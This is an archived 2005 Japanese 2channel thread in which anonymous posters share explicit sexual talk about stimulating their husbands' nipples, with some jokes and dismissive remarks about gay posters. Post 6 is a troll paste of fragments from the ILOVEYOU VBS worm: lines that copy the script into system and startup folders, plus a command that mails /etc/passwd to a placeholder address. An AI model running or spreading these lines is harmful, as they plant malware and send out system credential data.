2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

                   主人の乳首

1 : :2005/05/17(火) 21:39:15
コリコリするの、好き。

2 :名無しさん@お腹いっぱい。:2005/05/17(火) 21:40:49
鳥皮もウマイ。

3 :名無しさん@お腹いっぱい。:2005/05/17(火) 21:42:43
手羽塩が最高だね



4 :名無しさん@お腹いっぱい。:2005/05/17(火) 21:47:29
>>1は嫁の鏡だな

5 :名無しさん@お腹いっぱい。:2005/05/17(火) 21:50:25
ミノもコリコリ

6 :名無しさん@お腹いっぱい。:2005/05/17(火) 23:32:33
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"




7 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:33:54
好き。あの硬いのが。

8 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:40:16
か〜るく、噛むのぉ!

9 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:41:06
かる〜く

10 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:45:05
勃起しかけのペニスを優しくしごきながら
乳首を舐めたり軽く噛んだり。
そうすると下もだんだんカタクオオキクなってくる、、、

濡れちゃう。

11 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:46:13
むけちゃう。

12 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:46:33
俺も、二枚目の課長の乳首を昼休み、トイレの中で噛んで、勃起した俺のチソポを課長のケツマンコに入れたり入れられたりの毎日だよ。

13 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:48:00
それがヒル休み。

14 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:49:34
ホモスレがちゃんと他にあるよ。
旦那の乳首っていうスレだよ、ココ。

15 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:51:12
女が好きな男の乳首の話ししてる時、
ンコまみれな毛むくじゃらな話し持ち込まないでくれる?

16 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:51:26
所構わずがコヤツらの術だからの〜。

17 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:51:28
>>10
めっちゃリアルだな

18 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:55:19
>>17
だってそうするのが好きだから
できる時はそうしてるもん、、、

19 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:58:52
上に乗ってる時に勃起した両乳首を摘んでコリコリ、、、
その時の旦那の表情観るのが好き。

20 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:59:54
旦那の表情をハメ鳥。

21 :名無しさん@お腹いっぱい。:2005/05/19(木) 20:12:56
男の乳首。
カッコイイ。

22 :名無しさん@お腹いっぱい。:2005/05/19(木) 21:26:16
>>18
誰にしこまれたんだ、あ?

23 :名無しさん@お腹いっぱい。:2005/05/20(金) 15:57:17
>>22
しこまれたんじゃ無くて
彼氏の反応でおぼえたの。ピクンて。

24 :名無しさん@お腹いっぱい。:2005/05/20(金) 17:28:21
とりあえずブックマークしました

25 :名無しさん@お腹いっぱい。:2005/05/20(金) 19:46:36
このスレすごい興奮する…
頼むから続けて!

26 :名無しさん@お腹いっぱい。:2005/05/20(金) 21:52:29
実は書き込んでるの全員♂だってこと知ってる?

27 :名無しさん@お腹いっぱい。:2005/05/20(金) 21:57:25
>>26
そういう知りもしないコト言う人よくいるよねw

10、15、18、23を書いた私は間違い無く女だしw

28 :名無しさん@お腹いっぱい。:2005/05/20(金) 21:59:26
10、15、18、23、27
これからも宜しく頼む!できればステハンでも付けてくれ!

29 :名無しさん@お腹いっぱい。:2005/05/20(金) 22:00:46
>>27 勘違い

30 :名無しさん@お腹いっぱい。:2005/05/20(金) 22:06:08
>>27
悪かったよ
もっとエロっぽいのお願いね
あと容姿とかもちょこっと説明きぼんぬ

31 :名無しさん@お腹いっぱい。:2005/05/21(土) 09:01:06
8さん19さんも絶対続けて…
旦那になりたい…

32 :名無しさん@お腹いっぱい。:2005/05/21(土) 15:27:06
女性の方いませんかぁーーーー!!

33 :名無しさん@お腹いっぱい。:2005/05/21(土) 15:31:31
乳首を舐めて噛んでたっぷり愛撫したら
舌を這わせながら下の方に移動、、、お腹をつたって下腹、、、
手でしごかれて勃起しているものへと。

34 :名無しさん@お腹いっぱい。:2005/05/21(土) 15:37:30
それからそれから(*´Д`)ハァハァ

35 :名無しさん@お腹いっぱい。:2005/05/21(土) 15:43:11
指は乳首をもっと責めてて、、、舌は、、、

36 :名無しさん@お腹いっぱい。:2005/05/21(土) 15:46:40
ウウッ(;´Д`)ソレから?

37 :名無しさん@お腹いっぱい。:2005/05/21(土) 15:51:00
イッパイ濡らした舌は熱くて脈打ち始めてるものの先を、、、、






38 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:00:47
ハァハァ・・・もうダメ・・・

39 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:04:03
居ないからここでストップw

40 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:06:38
オワリ? ナンデダヨ!!!ヽ(`д´;)/ 

41 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:10:59
あれ?居たの?
今日はここまででゴメン。また今度ねw

42 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:23:44
もっと…

43 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:26:48
あぁ・・・・イキソウ・・なのに・・・

44 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:37:12
うちの旦那、ワイシャツを素肌に着る派なの。
だから、帰宅したらすぐ、ワイシャツの上から乳首当てゴッコして遊んであげるんだよ。

45 :名無しさん@お腹いっぱい。:2005/05/21(土) 17:01:53
ご両人、バカまるだしに決定。

46 :名無しさん@お腹いっぱい。:2005/05/21(土) 23:52:52
私はキスしながらワイシャツの上から乳首を摘むのが好き。
旦那の手が私の腰から胸に這い上がってくるとゾクゾクするな。

47 :名無しさん@お腹いっぱい。:2005/05/21(土) 23:54:44
>>45
バカで結構w
あなたもヒマねw

48 :名無しさん@お腹いっぱい。:2005/05/22(日) 00:01:40
コリコリびくびく気持ちイイ

49 :名無しさん@お腹いっぱい。:2005/05/22(日) 07:15:37
俺だってバカだ!
あ”あああああああ
お願い、俺のも触って・・・吸って(恥)

50 :名無しさん@お腹いっぱい。:2005/05/22(日) 07:19:00
俺の乳首、誰かいい男に弄繰り回されたい。

51 :名無しさん@お腹いっぱい。:2005/05/22(日) 10:30:29
>>1>>50






   _, ._
  ( ゚ Д゚)
  ( つ旦O
  と_)_)

    _, ._
  ( ゚ Д゚)   ガシャ
  ( つ O. __
  と_)_) (__()、;.o:。
          ゚*・:.。


52 :名無しさん@お腹いっぱい。:2005/05/22(日) 20:59:44
いじって!くれる?

53 :名無しさん@お腹いっぱい。:2005/05/22(日) 21:05:37
>>52
いいよ。俺でよかったら。

54 :名無しさん@お腹いっぱい。:2005/05/22(日) 22:30:37
ワイシャツを脱がせて
後ろから手を回して胸を指でなぞる、、、
背中にキスして舌を這わせながら指で乳首を摘むの。
もう一方の手は下、、、

55 :名無しさん@お腹いっぱい。:2005/05/22(日) 22:32:30
>>54
あのぅ?
お釜さんですか?

56 :名無しさん@お腹いっぱい。:2005/05/22(日) 22:37:03
>>55

一応男が好きな女ですが。
何か??

57 :名無しさん@お腹いっぱい。:2005/05/22(日) 22:38:56
思うけど、自分から男の身体を触る女を知らない男性って
多いのかもね、、。


58 :名無しさん@お腹いっぱい。:2005/05/22(日) 22:40:54
ある程度筋肉がついた男性の身体って魅力的だよね。
好きな人のは放っておけない。

59 :名無しさん@お腹いっぱい。:2005/05/22(日) 23:40:59
筋肉はそれなりに滑らかな硬さ、、、
乳首と男根にはそれなりの硬さと弾力があってたまらない。

60 :名無しさん@お腹いっぱい。:2005/05/22(日) 23:43:20

、、、、ああん出張中。

早く帰ってきて、、、、あなた、、、

61 :名無しさん@お腹いっぱい。:2005/05/25(水) 17:14:57
あげ

62 :名無しさん@お腹いっぱい。:2005/05/25(水) 19:01:53
舐めたい。

63 :名無しさん@お腹いっぱい。:2005/05/26(木) 12:37:31
なめて…

64 :名無しさん@お腹いっぱい。:2005/05/26(木) 15:40:58
いじめて

65 :名無しさん@お腹いっぱい。:2005/05/26(木) 17:33:24

    〃〃∩  _, ,_      ヤダ
     ⊂⌒( `Д´)       ヤダ
       `ヽ_つ ⊂ノ          ヤダ
              ジタバタ

         _, ,_
     〃〃(`Д´ ∩ < ヒトリデコリコリツマンナイヨ!
        ⊂   (
          ヽ∩ つ  ジタバタ


    〃〃∩  _, ,_
     ⊂⌒( つД´) < チクビナメテクレナキャヤダー
       `ヽ_ ノ ⊂ノ
              ジタバタ


       ∩
     ⊂⌒(  _, ,_) < ダレモナメテクレナイ…
       `ヽ_つ ⊂ノ
              ヒック...ヒック..


     ⊂⌒(  _, ,_) 
       `ヽ_つ ⊂ノ  zzz…



66 :名無しさん@お腹いっぱい。:2005/05/26(木) 20:05:25
ケツのアナも舐めて・・・・

67 :名無しさん@お腹いっぱい。:2005/05/26(木) 21:58:17
↑男か?

68 :名無しさん@お腹いっぱい。:2005/05/27(金) 10:01:25
俺の乳首も

69 :名無しさん@お腹いっぱい。:2005/05/27(金) 11:12:22
続きまーだー  はやくー

70 :名無しさん@お腹いっぱい。:2005/05/27(金) 11:17:32
hage

71 :名無しさん@お腹いっぱい。:2005/05/27(金) 11:42:01
>>65

可愛いw

72 :名無しさん@お腹いっぱい。:2005/05/27(金) 11:45:09
54から続く

そうして前へまわって摘まれて勃った乳首にくちづけ、、、

73 :名無しさん@お腹いっぱい。:2005/05/27(金) 11:49:34
うんうん

74 :名無しさん@お腹いっぱい。:2005/05/27(金) 19:06:22
私も、ワイシャツ姿の旦那を脱がせていくのが大好き。
ワイシャツのボタンを外させて、後ろに回り、ワイシャツを脱がせてやるの。
そして、背後から旦那の乳首を触りながら、、、、、

75 :名無しさん@お腹いっぱい。:2005/05/27(金) 23:43:12
オマイ等引っ張り杉だろが(゚Д゚)ゴルァ!!

76 :名無しさん@お腹いっぱい。:2005/06/02(木) 17:39:02
もうだめです。

77 :名無しさん@お腹いっぱい。:2005/06/02(木) 22:13:35
オマイ等1週間は引っ張り杉だろが(゚Д゚)ゴルァ!!


78 :名無しさん@お腹いっぱい。:2005/06/03(金) 22:46:14
耳に息を吹きかけるように、優しく話すの。
「だんな様、なんなりと。お風呂もご飯も用意できてるわ。
お帰りなさいませ。いとしい大切なだんな様。」

79 :名無しさん@お腹いっぱい。:2005/06/04(土) 08:04:42
それから!?

80 :名無しさん@お腹いっぱい。:2005/06/04(土) 08:56:35
ホモの主人。

81 :名無しさん@お腹いっぱい。:2005/06/04(土) 20:07:00
主人の乳首、凄く堅くていいわよ。

82 :名無しさん@お腹いっぱい。:2005/06/14(火) 19:37:52
素肌ワイシャツの上から男の乳首を舐めるのが大好きだ。

83 :名無しさん@お腹いっぱい。:2005/06/19(日) 19:35:01
あたしも好き。旦那の乳首で遊ぶの。

84 :名無しさん@お腹いっぱい。:2005/06/19(日) 21:32:13
舐めまわすんです。主人の乳首を。

85 :名無しさん@お腹いっぱい。:2005/06/20(月) 00:49:27
くわしく!

86 :名無しさん@お腹いっぱい。:2005/06/20(月) 01:32:52
緩んでる乳首を反時計回りにペロ、チュッと。
時計回りにするより、緊張感が出るんですよ。
固くなってきたら、言葉をつかいながら、少しだけマウント。
こんどは私のを。やっぱり受身がいいんです。


87 :練乳:2005/06/21(火) 16:47:26
前歯でコリコリして下さい(;´Д`)ハァハァ

88 :名無しさん@お腹いっぱい。:2005/06/22(水) 00:12:05
歯は使いません。強すぎるんですよ。
唇に、刺激の少ないリップクリームをたくさん塗っておくんです。
歯に被せるように、充分慣らして。
はさむと、だんなの体臭が少し、鼻腔に流れてくるんですが、それがいいんです。

89 :名無しさん@お腹いっぱい。:2005/06/22(水) 09:56:01
>>88(*´Д`)'`ァ'`ァ

90 : ◆H6.FdleSKI :2005/06/23(木) 16:42:58
主人の乳首、結婚当初ピンクだったのね
でも、もう結婚20年になるんだけど、どす黒状態・・・吸すぎかな?
あぁ〜ヤングのピンクチクビが吸いたいわぁ〜

91 :練乳@あぁ永遠の黒チクビ:2005/06/24(金) 11:13:29
おいらも嫁ちゃんに舐められすぎてドス黒だよ!
当然、嫁ちゃんのチクビもドドメ色になってるけどね!

92 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:26:06
内の読めはちゅちゅっ、としか吸ってくれない。
漏れの性感帯なのに・・・・
みんな裏山〜〜!

93 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:29:35
漏れは、れろれろ、かみかみしてもらっていまつ

94 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:30:33
恥ずかしながら四十を過ぎて目覚めた。
損な人生を送ってしまったと後悔している。

95 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:40:47
目覚めたならいいじゃん!
今から楽しめ

96 :練乳@人生これからだ:2005/06/24(金) 11:42:59
>>94
40にして立つ!と申します。。。

97 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:44:47
嫁の消極性を恨むばかりなり。

98 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:45:43
うんうん・・・おれの女房も淡白なのでワカルよ・・・

99 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:46:02
オレはホモですが、男同士乳首舐め合ってます。
乳首はオトコの性感帯ですよ。
ちなみに肛門もかなりの男が舐めてもらいたいハズです。
気付いていないだけで、開発されるのを人知れず待っている部分です。

レス汚し、スマソ

100 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:48:15
嫁の前ですきを作るとすぐビーチクつまみに来るんだ。
「そんな事するのお前だけだ。」って言うと、「どこのうちも
ほんとはやってるんだよ〜。」って無反省w

101 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:50:01
>>98
若い頃は開発すべく頑張ったんだがね。
体質なのか気質なのか失敗に終わったね。
おのれの力、至らずか・・・
虚しいね〜。

102 :名無しさん@お腹いっぱい。:2005/06/24(金) 11:53:32
実を言うと俺もホモなのだが、チクビを攻めるのが
まずは、俺達のセオリーとなっているのです。
ぺ○スを舐めてやるのは、当たり前なのですが、
99さんの言うようにアナルもひとつの性感帯なのですね
がんばって、くださいまし〜

99さんに次いで、レス汚し、スマソ


103 :練乳@乳首ぴんこ立ち:2005/06/24(金) 11:58:00
>>100
素晴しい奥さんだ!これからもピーチクパーチク楽しんでください。

>>99>>102
ホモはイラネ

104 :名無しさん@お腹いっぱい。:2005/06/24(金) 12:03:16
同感同感、ホモはいらんね。


105 :名無しさん@お腹いっぱい。:2005/06/24(金) 12:04:51
>>101
じっくり話しあうことだと思いますよ。
実際、ご夫婦これからも仲良く生活しなければいけないんだしね。
性の問題は、やっぱり真面目に考えないといけないと思うのですが
どんなもんでしょうか?  マジレスでスマソ。

106 :名無しさん@お腹いっぱい。:2005/06/24(金) 12:08:25
>>103-104
ホモに反応しちゃってるけど、どうして?
自分の中にあるホモ因子を刺激されちゃったからですか?

107 :名無しさん@お腹いっぱい。:2005/06/24(金) 12:09:22
>>105
いやいや、とりあえず円満にやってるからw
どうもうちは性の問題にウエイトをかけなくても大丈夫みたいだわ。
この先どう転ぶかはわからんけどねw
と、一応マジレス。

108 :名無しさん@お腹いっぱい。:2005/06/24(金) 12:20:16
>>106
オマイのようにホモではないからだ!

109 :105:2005/06/24(金) 12:21:58
>>107
そうですか〜それは何よりですね。
仲良きことは美しきかな、お幸せに!!

110 :107:2005/06/24(金) 12:28:15
>>109
どうもどうも。ペコリ。

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)